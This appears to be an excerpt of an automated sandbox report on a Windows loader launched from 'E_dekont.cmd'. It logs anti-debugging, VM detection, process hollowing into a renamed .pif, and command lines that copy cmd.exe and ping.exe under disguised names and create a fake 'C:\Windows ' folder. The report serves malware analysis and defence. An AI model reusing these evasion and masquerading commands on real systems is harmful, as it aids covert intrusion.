Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif API coverage: 7.9 %
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF API coverage: 9.7 %
Source: C:\Users\Public\Libraries\wdmvmswJ.pif API coverage: 8.9 %
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF API coverage: 9.6 %
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4784 Thread sleep time: -150000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 4468 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772 Thread sleep count: 5124 > 30
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 6772 Thread sleep count: 4310 > 30
Source: C:\Windows\System32\alg.exe TID: 4520 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6164 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe TID: 3148 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5240 Thread sleep time: -260000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5396 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 2668 Thread sleep count: 484 > 30
Source: C:\Windows\System32\msdtc.exe TID: 2668 Thread sleep time: -48400s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 2944 Thread sleep time: -250000s >= -30000s
Source: C:\Users\Public\Libraries\wdmvmswJ.pif TID: 5912 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 4_2_02AF5908
Source: C:\Users\Public\alpha.pif Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 13_2_00020207
Source: C:\Users\Public\alpha.pif Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 13_2_0002589A
Source: C:\Users\Public\alpha.pif Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose, 13_2_00033E66
Source: C:\Users\Public\alpha.pif Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 13_2_00024EC1
Source: C:\Users\Public\alpha.pif Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 13_2_0001532E
Source: C:\Users\Public\alpha.pif Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 17_2_0002589A
Source: C:\Users\Public\alpha.pif Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 17_2_00020207
Source: C:\Users\Public\alpha.pif Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose, 17_2_00033E66
Source: C:\Users\Public\alpha.pif Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 17_2_00024EC1
Source: C:\Users\Public\alpha.pif Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 17_2_0001532E
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Thread delayed: delay time: 60000
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Y2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Jwsmvmdw.PIF, 0000001B.00000002.1662054093.00000000006CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>a9
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @wvid.infvid.devicedescMicrosoft Hyper-V Virtualization Infrastructure DriverN
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver4
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverVHD Loopback Contr
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1635254831.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1668502646.00000000005B2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1610304966.00000000005B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
Source: AppVClient.exe, 00000016.00000003.1594100597.00000000004A0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000002.1595686617.00000000004A1000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000016.00000003.1593875501.0000000000470000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: xpha.pif, 00000012.00000002.1697939115.0000000002EAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
Source: Jwsmvmdw.PIF, 00000024.00000002.1753075839.0000000000638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wdmvmswJ.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 4_2_02B0F744
Source: C:\Users\user\AppData\Local\Temp\x.exe Process queried: DebugPort
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process queried: DebugPort
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9, 12_1_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary, 4_2_02B0894C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0047B594 mov eax, dword ptr fs:[00000030h] 12_1_0047B594
Source: C:\Users\Public\alpha.pif Code function: 13_2_0003C1FA mov eax, dword ptr fs:[00000030h] 13_2_0003C1FA
Source: C:\Users\Public\alpha.pif Code function: 17_2_0003C1FA mov eax, dword ptr fs:[00000030h] 17_2_0003C1FA
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_0047B594 mov eax, dword ptr fs:[00000030h] 30_2_0047B594
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_10001130 mov eax, dword ptr fs:[00000030h] 30_2_10001130
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_10043F3D mov eax, dword ptr fs:[00000030h] 30_2_10043F3D
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_1_0047B594 mov eax, dword ptr fs:[00000030h] 30_1_0047B594
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0040ADB0 GetProcessHeap,HeapFree, 12_1_0040ADB0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_1_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_1_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_004123F1 SetUnhandledExceptionFilter, 12_1_004123F1
Source: C:\Users\Public\alpha.pif Code function: 13_2_00026EC0 SetUnhandledExceptionFilter, 13_2_00026EC0
Source: C:\Users\Public\alpha.pif Code function: 13_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00026B40
Source: C:\Users\Public\alpha.pif Code function: 17_2_00026EC0 SetUnhandledExceptionFilter, 17_2_00026EC0
Source: C:\Users\Public\alpha.pif Code function: 17_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00026B40
Source: C:\Users\Public\xpha.pif Code function: 18_2_00893600 SetUnhandledExceptionFilter, 18_2_00893600
Source: C:\Users\Public\xpha.pif Code function: 18_2_00893470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00893470
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_2_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_2_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_004123F1 SetUnhandledExceptionFilter, 30_2_004123F1
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_10041361
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_2_10044C7B
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 30_1_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_1_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_1_004123F1 SetUnhandledExceptionFilter, 30_1_004123F1
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtQuerySystemInformation: Indirect: 0x9B8462
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtClose: Indirect: 0x140077E81
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtAdjustPrivilegesToken: Indirect: 0x9B864C
Source: C:\Users\user\AppData\Local\Temp\x.exe Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 3FB008
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2B0008
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2E2008
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_10028550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW, 30_2_10028550
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 4_2_02AF5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 4_2_02AFA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 4_2_02AF5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: GetLocaleInfoA, 4_2_02AFA810
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: GetLocaleInfoA, 12_1_00417A20
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 13_2_00018572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 13_2_00016854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 13_2_00019310
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 17_2_00018572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 17_2_00016854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 17_2_00019310
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 27_2_029B5ACC
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 27_2_029B5BD7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: GetLocaleInfoA, 27_2_029BA810
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: GetLocaleInfoA, 30_2_00417A20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: GetLocaleInfoA, 30_1_00417A20
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 36_2_029D5ACC
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 36_2_029D5BD7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Code function: GetLocaleInfoA, 36_2_029DA810
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
